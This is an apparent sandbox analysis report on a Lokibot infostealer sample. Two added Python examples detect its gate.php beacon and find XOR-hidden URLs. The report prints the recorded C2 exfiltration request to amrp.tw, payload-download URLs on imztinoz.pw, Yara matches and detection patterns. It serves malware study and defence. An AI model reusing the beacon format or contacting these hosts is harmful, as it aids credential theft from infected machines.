                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global traffic | HTTP traffic detected (the same request was recorded 48 times in this run):
                    POST /kayo/gate.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: amrp.tw
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: FC7C64DA
                    Content-Length: 163
                    Connection: close
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Code function: 5_2_00404ED4 recv
                Source: unknown | DNS traffic detected: queries for: amrp.tw
                Source: unknown | HTTP traffic detected:
                    POST /kayo/gate.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: amrp.tw
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: FC7C64DA
                    Content-Length: 190
                    Connection: close
                Source: global traffic | HTTP traffic detected (server response):
                    HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 29 Apr 2021 07:18:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Vary: Accept-Encoding
                    X-Powered-By: PHP/5.6.40
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.
                Source: FJbeidnZOF.exe, 00000005.00000002.476800352.00000000004A0000.00000040.00000001.sdmp | String found in binary or memory: http://amrp.tw/kayo/gate.php
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
                Source: FJbeidnZOF.exe | String found in binary or memory: http://imztinoz.pw/TM/v.txt
                Source: FJbeidnZOF.exe | String found in binary or memory: http://imztinoz.pw/TM/v.txtShttp://www.imztinoz.pw/TM/TaskManager.exe
                Source: FJbeidnZOF.exe, 00000001.00000002.238650996.0000000002521000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: FJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
                Source: FJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comn-u
                Source: FJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comr
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
                Source: FJbeidnZOF.exe, 00000001.00000003.220215711.00000000055F7000.00000004.00000001.sdmp, FJbeidnZOF.exe, 00000001.00000003.220145165.00000000055F7000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: FJbeidnZOF.exe, 00000001.00000003.219820600.00000000055F7000.00000004.00000001.sdmp, FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
                Source: FJbeidnZOF.exe, 00000001.00000003.236778250.00000000055C6000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comgrito
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
                Source: FJbeidnZOF.exe, 00000001.00000003.210930152.00000000055E5000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.c
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp, FJbeidnZOF.exe, 00000001.00000003.210887774.00000000055FC000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
                Source: FJbeidnZOF.exe, 00000001.00000003.211196074.00000000055CB000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: FJbeidnZOF.exe, 00000001.00000003.210887774.00000000055FC000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn_
                Source: FJbeidnZOF.exe, 00000001.00000003.210756308.00000000055D9000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cns
                Source: FJbeidnZOF.exe, 00000001.00000003.210887774.00000000055FC000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnw-
                Source: FJbeidnZOF.exe | String found in binary or memory: http://www.freewebs.com/tonysfiles
                Source: FJbeidnZOF.exe, 00000001.00000003.222657946.00000000055F9000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: FJbeidnZOF.exe, 00000001.00000003.222657946.00000000055F9000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/W
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp, FJbeidnZOF.exe, 00000001.00000003.222657946.00000000055F9000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
                Source: FJbeidnZOF.exe, FJbeidnZOF.exe, 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
                Source: FJbeidnZOF.exe | String found in binary or memory: http://www.imztinoz.pw/TM/15.bat
                Source: FJbeidnZOF.exe | String found in binary or memory: http://www.imztinoz.pw/TM/15.batKFile
                Source: FJbeidnZOF.exe | String found in binary or memory: http://www.imztinoz.pw/TM/TaskManager.exe
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: FJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/(
                Source: FJbeidnZOF.exe, 00000001.00000003.215445328.00000000055D5000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/=
                Source: FJbeidnZOF.exe, 00000001.00000003.215137041.00000000055CE000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/A
                Source: FJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/B
                Source: FJbeidnZOF.exe, 00000001.00000003.215137041.00000000055CE000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
                Source: FJbeidnZOF.exe, 00000001.00000003.215445328.00000000055D5000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Z
                Source: FJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/f
                Source: FJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                Source: FJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Z
                Source: FJbeidnZOF.exe, 00000001.00000003.215137041.00000000055CE000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/l
                Source: FJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/p
                Source: FJbeidnZOF.exe, 00000001.00000003.215137041.00000000055CE000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/w
                Source: FJbeidnZOF.exe, 00000001.00000003.215137041.00000000055CE000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/~
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
                Source: FJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comF
                Source: FJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comT
                Source: FJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comlic
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
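The C2 exchange recorded above has a fixed shape: an HTTP/1.0 POST to a gate.php path, the User-Agent Mozilla/4.08 (Charon; Inferno), a Content-Key header and an application/octet-stream body sent with Content-Encoding: binary. The gate answered 404 "File not found." in this run, so it is the request, not the response, that identifies an infected host on the wire. The Python below is an added example and not part of the Joe Sandbox report: it parses raw HTTP requests and scores them against those traits. The two sample requests are constructed, one from the headers recorded above (body omitted) and one benign browser-style GET as a control; the threshold of three indicators is an assumption chosen so that a single weak trait, such as an HTTP/1.0 POST on its own, is not enough to alert.

```python
"""Score raw HTTP requests against the Lokibot gate.php beacon shape.

Added example; not part of the sandbox report.  The sample requests are
constructed from the headers recorded in the report, plus a benign control.
"""
import re
from dataclasses import dataclass, field


@dataclass
class HttpRequest:
    method: str
    path: str
    version: str
    headers: dict = field(default_factory=dict)


def parse_request(raw: str) -> HttpRequest:
    """Parse the request line and header block of a raw HTTP request.

    Header names are lower-cased so lookups are case-insensitive.  The body,
    if any, is ignored: the beacon body is opaque binary and carries nothing
    this check needs.
    """
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = head.splitlines()
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, version, headers)


# The User-Agent is the strongest single trait; the others are weak on their own.
CHARON_UA = re.compile(r"^Mozilla/4\.08 \(Charon; Inferno\)$")


def lokibot_beacon_indicators(req: HttpRequest) -> list:
    """Return the names of the beacon traits present in `req`."""
    hits = []
    if CHARON_UA.match(req.headers.get("user-agent", "")):
        hits.append("charon-inferno-ua")
    if req.method == "POST" and req.version == "HTTP/1.0":
        hits.append("http10-post")
    if req.path.rsplit("/", 1)[-1] == "gate.php":
        hits.append("gate-php-path")
    if "content-key" in req.headers:
        hits.append("content-key-header")
    if (req.headers.get("content-type") == "application/octet-stream"
            and req.headers.get("content-encoding") == "binary"):
        hits.append("binary-octet-stream-body")
    return hits


def is_lokibot_beacon(raw: str, min_hits: int = 3) -> bool:
    """True when at least `min_hits` traits are present (threshold is an assumption)."""
    return len(lokibot_beacon_indicators(parse_request(raw))) >= min_hits


# Constructed from the headers in the report above (body omitted).
BEACON_REQUEST = (
    "POST /kayo/gate.php HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: amrp.tw\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: FC7C64DA\r\n"
    "Content-Length: 163\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# Constructed benign control: an ordinary browser-style GET.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Accept: */*\r\n"
    "\r\n"
)


if __name__ == "__main__":
    for name, raw in (("beacon", BEACON_REQUEST), ("benign", BENIGN_REQUEST)):
        hits = lokibot_beacon_indicators(parse_request(raw))
        print(f"{name}: {len(hits)} indicator(s) {hits} -> beacon={is_lokibot_beacon(raw)}")
```

The same traits map directly onto an IDS rule (User-Agent string plus the Content-Key header on a POST), which is the kind of match the Snort alert listed in the summary fires on; scoring several traits rather than the User-Agent alone keeps the check useful if a later build changes that one string.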

                System Summary:

                Malicious sample detected (through community Yara rule)
                Source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
                Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                Source: 1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.FJbeidnZOF.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                Source: 5.2.FJbeidnZOF.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.FJbeidnZOF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                Source: 5.2.FJbeidnZOF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Code function: 1_2_009794A8
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Code function: 1_2_0097C3A0
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Code function: 1_2_0097A758
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Code function: 5_2_0040549C
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Code function: 5_2_004029D4
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Code function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Code function: String function: 00405B6F appears 42 times
                Source: FJbeidnZOF.exe, 00000001.00000002.239213057.0000000003730000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDSASignature.dll@ vs FJbeidnZOF.exe
                Source: FJbeidnZOF.exe, 00000001.00000000.207005847.00000000001C0000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSoapServices.exe8 vs FJbeidnZOF.exe
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSimpleUI.dll( vs FJbeidnZOF.exe
                Source: FJbeidnZOF.exe, 00000005.00000000.235449734.00000000005E0000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSoapServices.exe8 vs FJbeidnZOF.exe
                Source: FJbeidnZOF.exe | Binary or memory string: OriginalFilenameSoapServices.exe8 vs FJbeidnZOF.exe
                Source: FJbeidnZOF.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-03-09
                Source: 1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.FJbeidnZOF.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 5.2.FJbeidnZOF.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-03-09
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-03-09
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.FJbeidnZOF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 5.2.FJbeidnZOF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
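The SUSP_XORed_URL_in_EXE matches on the unpacked payloads above flag a URL that is stored under a single-byte XOR rather than in the clear, which is why it does not show up in a plain strings listing of the packed file. The Python below is an added example, not code from the report and not the matched rule itself: it performs the equivalent scan over a constructed byte blob by trying every one-byte key, searching for an http:// or https:// prefix under that key and decoding the printable run that follows. The blob, the key 0x5A and the .invalid hostnames are constructed for the demonstration; the report does not say which URL the rule matched in this sample, and this scan covers single-byte keys only.

```python
"""Find single-byte-XOR-obscured URLs in a byte blob.

Added example; not code from the report or from the SUSP_XORed_URL_in_EXE rule.
The blob, the key 0x5A and the .invalid hostnames below are constructed.
"""
PREFIXES = (b"http://", b"https://")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of `data` with the one-byte `key`."""
    return bytes(b ^ key for b in data)


def _decode_run(blob: bytes, offset: int, key: int) -> str:
    """Decode from `offset` under `key` until the first byte that is not
    printable ASCII without whitespace (0x21..0x7e), which ends the URL."""
    out = bytearray()
    for b in blob[offset:]:
        c = b ^ key
        if c < 0x21 or c > 0x7E:
            break
        out.append(c)
    return out.decode("ascii")


def find_xored_urls(blob: bytes) -> list:
    """Return (offset, key, url) for every http(s):// prefix found under any
    single-byte XOR key, sorted by offset.  Key 0 reports plaintext URLs as
    well, which doubles as a sanity check against a plain strings listing."""
    found = []
    for key in range(256):
        for prefix in PREFIXES:
            needle = xor_bytes(prefix, key)
            start = 0
            while (off := blob.find(needle, start)) != -1:
                found.append((off, key, _decode_run(blob, off, key)))
                start = off + 1
    return sorted(found)


# Constructed blob: 0xFF padding, a URL XORed with 0x5A, more padding, then a
# plaintext URL.  0xFF is used as padding because it decodes to a non-printable
# byte under both keys, so it terminates the decoded run cleanly.
HIDDEN_URL = b"http://example.invalid/gate.php"
SAMPLE_BLOB = (
    b"\xff" * 8
    + xor_bytes(HIDDEN_URL, 0x5A)
    + b"\xff" * 4
    + b"http://plain.invalid/"
    + b"\xff" * 2
)


if __name__ == "__main__":
    for off, key, url in find_xored_urls(SAMPLE_BLOB):
        print(f"offset {off:#06x} key {key:#04x}: {url}")
```

Running the scan over a dumped memory region or an unpacked PE section is the same call with the file contents in place of SAMPLE_BLOB; a real binary will produce some short false positives at keys where seven bytes happen to line up, so in practice the decoded run is worth filtering on length and on a plausible host before treating it as an indicator.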
                Source: FJbeidnZOF.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/3@81/2
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Code function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Code function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FJbeidnZOF.exe.log
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | File read: C:\Windows\System32\drivers\etc\hosts (recorded 4 times)
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
                Source: FJbeidnZOF.exeVirustotal: Detection: 22%
                Source: FJbeidnZOF.exeReversingLabs: Detection: 27%
                Source: FJbeidnZOF.exeString found in binary or memory: ble> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle
                Source: FJbeidnZOF.exeString found in binary or memory: ble> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle
                Source: FJbeidnZOF.exeString found in binary or memory: es>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvail
